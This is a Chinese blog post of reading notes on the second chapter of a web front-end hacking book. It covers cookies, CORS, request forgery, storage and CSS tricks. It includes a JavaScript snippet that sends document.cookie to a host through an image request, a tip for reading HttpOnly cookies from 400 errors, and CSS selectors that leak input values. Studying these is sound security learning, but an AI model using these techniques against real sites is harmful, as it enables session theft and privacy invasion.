《Web前端黑客技术解密》读书笔记(第二章)

本文地址:http://www.jianshu.com/p/16500959dec0

第二章

HTTP

Set-Cookie: 每个 Set-Cookie设置一个Cookie,如下示例:

Set-Cookie: PTOKEN=; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/; domain=.foo.com; httpOnly; Secure;

Set-Cookie: USERIDPT=C93984899D983; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/; domain=.foo.com;
  • expires:过期时间,如果是过去时间,表明这个Cookie要被删掉
  • path:相对路径,只有这个路径下的资源可以访问这个Cookie
  • domain: 域名,有权限设置为更高一级的域名
  • HttpOnly:标志(默认无,若有表明Cookie存在于HTTP层面,不能被客户端脚本读到)
  • Secure: 标志(默认无,若有表明Cookie仅通过HTTPS协议传输)

iframe:不同域时,子页面可以修改父页面location.href,但是不能读取;

跨转请求(CORS)

通过给目标域添加 Access-Control-Allow-Origin

如果不设置Access-Control-Allow-Origin:http://www.foo.com,数据依然可以被偷到。虽然浏览器会报错,但目标域依然可以接受到

默认情况下,这样的跨域无法带上目标域的会话,前端需要设置 XHR 的 withCredentialstrue,同时目标域必须设置如下:

<?php
header('Access-Control-Allow-Origin: http://www.foo.com');
header('Access-Control-Allow-Credentials: true'); // 允许跨域证书发送
// ...
?>

模拟用户发浏览器请求

第一种 通过js动态创建iframe/frame/script/link/img等标签,然后将他们的src或href属性指向目标地址

var cookie = escape(document.cookie);
new Image().src = 'http://localhost/?'+cookie;
// 或(会跳页面)
location.href='http://localhost/?'+cookie;

第二种 通过创建XHR发送同步或异步请求

默认POST提交的 Content-Typeapplication/x-www-urlencoded,还有一种常见的 multipart/form-data ,一般有文件上传时用这种

第三种 通过原生form表单,常用于 CSRF 攻击

通过创建 forminput等标签,然后设置form的 form.action="http://localhost/...",调用 form.submit() 提交表单

Cookie

  1. 子域Cookie机制
  • 不指定domain时,默认为当前域
// 当前域为foo.test.com 时候,domain为foo.test.com
document.cookie='test=1;'
  • 可以设置上级根域,向下不行,好处是不同子域可以共享 Cookie,但也会造成攻击

如当前域名为 foo.test.com

// 可行
document.cookie='test=1;domain=test.com;'

//不可行
document.cookie='test=1;domain=bar.foo.test.com;'
  1. 路径Cookie机制
  • 设置Cookie如果不指定path的值,默认为当前页面的路径

如:a.foo.com/admin/index.php 页面下设置Cookie,path的值为 /admin/

  • 不同路径下Cookie不能互相读取,可以借助iframe的DOM操作即可
var src = '....';
var iframe = document.createElement('iframe');
iframe.src = src;
iframe.onload = function(){
    var doc = iframe.contentDocument || iframe.contentWindow.document;
    console.log(doc.cookie);
}
  1. HttpOnly Cookie机制
  • 添加HttpOnly标志后,仅在 HTTP层面传输,JS获取不到

以PHP为例

<?php
// 设置普通Cookie
setcookie('test', 1, time() + 3600, "", "", 0);

// 第七个参数是HttpOnly标志,1为开启,0为关闭
setcookie('test', 1, time() + 3600, "", "", 0, 1);
?>
  • 服务端报错时可能会抛出相关Cookie信息,尤其是400错误

所以模拟一个400请求,通过解析响应就可以得到 HttpOnly 的Cookie

  1. Secure Cookie机制
  • Cookie只能在 HTTPS层面传输
  • js可以读取 Secure Cookie ,当然就可以篡改
// path与domain必须一致,否则为不同Cookie
document.cookie = 'test=1;path=/;secure;';
  1. 本地Cookie与内存Cookie
  • expires 紧密相关,没设置过期时间为内存Cookie,浏览器关闭就消失;设置了为本地Cookie,为以文本形式保存在本地,到期后自动消失

  • 可以修改内存Cookie为本地Cookie,安全的核心在于服务端校验,合法性、唯一性、是否被篡改等

  1. Cookie的P3P性质

P3P(Platform for Privacy Preferences Project)为HTTP响应头的一个字段,为W3C公布的一项隐私保护推荐标准,用于标示是否允许目标网站的Cookie被另一个域通过加载目标网站而设置或发送,仅IE执行了该策略(具体参考书本 P41)

几种存储方式比较

  • Cookie

一般50个,最新chrome可以存170个,每个最大4K。超过会被删除一些。删除方式是设置过期时间即可。无法跨浏览器

  • userDate

IE中持久存储,最大64K左右

  • localStorage\sessionStorage

区别是localStorage一直生效,sessionStorage在关闭浏览器时会删除,用法两种一样

  • FlashCookie

跨浏览器通用解决方案,默认存储大小为100K

函数劫持

js劫持只需重写这个函数即可

CSS伪装

通过设置伪类可以出发请求

// 可以知道浏览器是否访问过 http://google.com
a:visited{
    background:url(http://google.com)
}

// 用户在input表单中输入a开头就会发送一个请求
input[value^='a']{
    background:url(http://google.com);
}

// 鼠标选择就会发送请求
#select::selection{
    background:url(http://google.com)
}

// ...

附原书购买地址: http://item.jd.com/11181832.html

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,245评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,749评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,960评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,575评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,668评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,670评论 1 294
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,664评论 3 415
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,422评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,864评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,178评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,340评论 1 344
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,015评论 5 340
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,646评论 3 323
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,265评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,494评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,261评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,206评论 2 352

推荐阅读更多精彩内容